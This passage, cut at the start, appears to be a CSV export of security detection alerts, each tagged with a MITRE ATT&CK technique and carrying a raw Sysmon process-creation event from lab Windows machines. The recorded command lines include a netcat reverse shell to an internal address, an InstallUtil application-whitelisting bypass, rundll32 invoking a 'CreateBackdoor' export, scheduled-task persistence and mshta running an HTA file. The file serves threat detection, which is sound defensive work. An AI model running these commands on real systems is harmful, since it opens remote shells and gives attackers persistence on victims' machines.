<Data Name=""Hashes"">SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">580</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-03T12:06:55.820406Z"">
</TimeCreated>
<EventRecordID>5435</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-03 12:06:55.471</Data>
<Data Name=""ProcessGuid"">747F3D96-78DF-5D45-0000-0010EF400401</Data>
<Data Name=""ProcessId"">4320</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
<Data Name=""LogonId"">0x18d3b3</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-78DF-5D45-0000-0010BD350401</Data>
<Data Name=""ParentProcessId"">5756</Data>
<Data Name=""ParentImage"">C:\Windows\System32\Dism.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\dism.exe&quot; /online /norestart /apply-unattend:&quot;C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1628379182.783518,2021-08-08T03:33:02.783518+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-08-07T23:33:01.176666Z"">
</TimeCreated>
<EventRecordID>556726</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3232"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-08-07 23:33:01.121</Data>
<Data Name=""ProcessGuid"">747F3D96-182D-610F-0000-00100344D300</Data>
<Data Name=""ProcessId"">11196</Data>
<Data Name=""Image"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Host Process for Windows Services</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">svchost.exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\LOCAL SERVICE</Data>
<Data Name=""LogonGuid"">747F3D96-90AF-610F-0000-0020E5030000</Data>
<Data Name=""LogonId"">0x3e5</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">632</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1603490287.601524,2020-10-24T01:58:07.601524+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\schtasks.exe ) through command line ( schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:57:36.631669Z"">
</TimeCreated>
<EventRecordID>424079</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:57:36.627</Data>
<Data Name=""ProcessGuid"">747F3D96-51D0-5F93-0000-001079C05B00</Data>
<Data Name=""ProcessId"">8572</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\schtasks.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Task Scheduler Configuration Tool</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">schtasks.exe</Data>
<Data Name=""CommandLine"">schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Local\Temp\tmp1375\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002085A50800</Data>
<Data Name=""LogonId"">0x8a585</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=77F125CE5840293890E1359483C7104AADE25FA7,MD5=5BD86A7193D38880F339D4AFB1F9B63A,SHA256=72900A86F3BED7570AA708657A76DD76BB80B68DB543D303DA401AC6983E39CE,IMPHASH=012D1B3C5FD8B10F0F36DB7243A28CB8</Data>
<Data Name=""ParentProcessGuid"">747F3D96-51D0-5F93-0000-0010B2B35B00</Data>
<Data Name=""ParentProcessId"">5572</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564435988.318896,2019-07-30T01:33:08.318896+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:08.202018Z"">
</TimeCreated>
<EventRecordID>4897</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:08.174</Data>
<Data Name=""ProcessGuid"">747F3D96-6614-5D3F-0000-001093CE8600</Data>
<Data Name=""ProcessId"">108</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.563997,2019-05-27T05:29:19.563997+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;Line Number: 0&quot; /text:userName ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:19.563997Z"">
</TimeCreated>
<EventRecordID>5964</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:19.513</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-0010CFCAFF00</Data>
<Data Name=""ProcessId"">3892</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;Line Number: 0&quot; /text:userName</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1589239343.719794,2020-05-12T03:22:23.719794+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-05-11T23:21:56.661289Z"">
</TimeCreated>
<EventRecordID>141993</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2896"" ThreadID=""3548"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-05-11 23:21:56.654</Data>
<Data Name=""ProcessGuid"">747F3D96-DE14-5EB9-0000-001079154300</Data>
<Data Name=""ProcessId"">224</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\tools\PrivEsc\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-5461-5EBA-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DE14-5EB9-0000-00107C0F4300</Data>
<Data Name=""ParentProcessId"">4468</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\Tools\Misc\nc64.exe</Data>
<Data Name=""ParentCommandLine"">c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766818.011502,2020-03-21T09:00:18.011502+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:18.007678Z"">
</TimeCreated>
<EventRecordID>243520</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.533</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-00103D6F1E00</Data>
<Data Name=""ProcessId"">7124</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766818.011502,2020-03-21T09:00:18.011502+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:18.007678Z"">
</TimeCreated>
<EventRecordID>243520</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.533</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-00103D6F1E00</Data>
<Data Name=""ProcessId"">7124</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1218.005 ] Mshta found running in the system,1628379181.118316,2021-08-08T03:33:01.118316+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line (&quot;C:\Windows\SysWOW64\mshta.exe&quot; &quot;C:\Users\Public\memViewData.hta&quot; {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}) and Parent Image :C:\Windows\explorer.exe , Parent CommandLine (C:\Windows\Explorer.EXE) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-08-07T23:33:01.103287Z"">
</TimeCreated>
<EventRecordID>556720</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3232"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-08-07 23:33:01.091</Data>
<Data Name=""ProcessGuid"">747F3D96-182D-610F-0000-00106F40D300</Data>
<Data Name=""ProcessId"">9932</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">MSHTA.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\SysWOW64\mshta.exe&quot; &quot;C:\Users\Public\memViewData.hta&quot; {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-1231-610F-0000-002057A80700</Data>
<Data Name=""LogonId"">0x7a857</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=EE1ED6AEA892E2ABCFA64D9D51078EFDFAEA6253,MD5=4DBAFC3C0B7A9CAA67D6C2C3D99422F2,SHA256=12C94C614FB752DC1F6797B5FB3AD67719E3C924FACDA35DC36792C8E5AC45FC,IMPHASH=4CB8A74361E70A5FF774A0A1A7C65989</Data>
<Data Name=""ParentProcessGuid"">747F3D96-1239-610F-0000-0010D0210A00</Data>
<Data Name=""ParentProcessId"">600</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766818.011502,2020-03-21T09:00:18.011502+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:18.007678Z"">
</TimeCreated>
<EventRecordID>243520</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.533</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-00103D6F1E00</Data>
<Data Name=""ProcessId"">7124</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
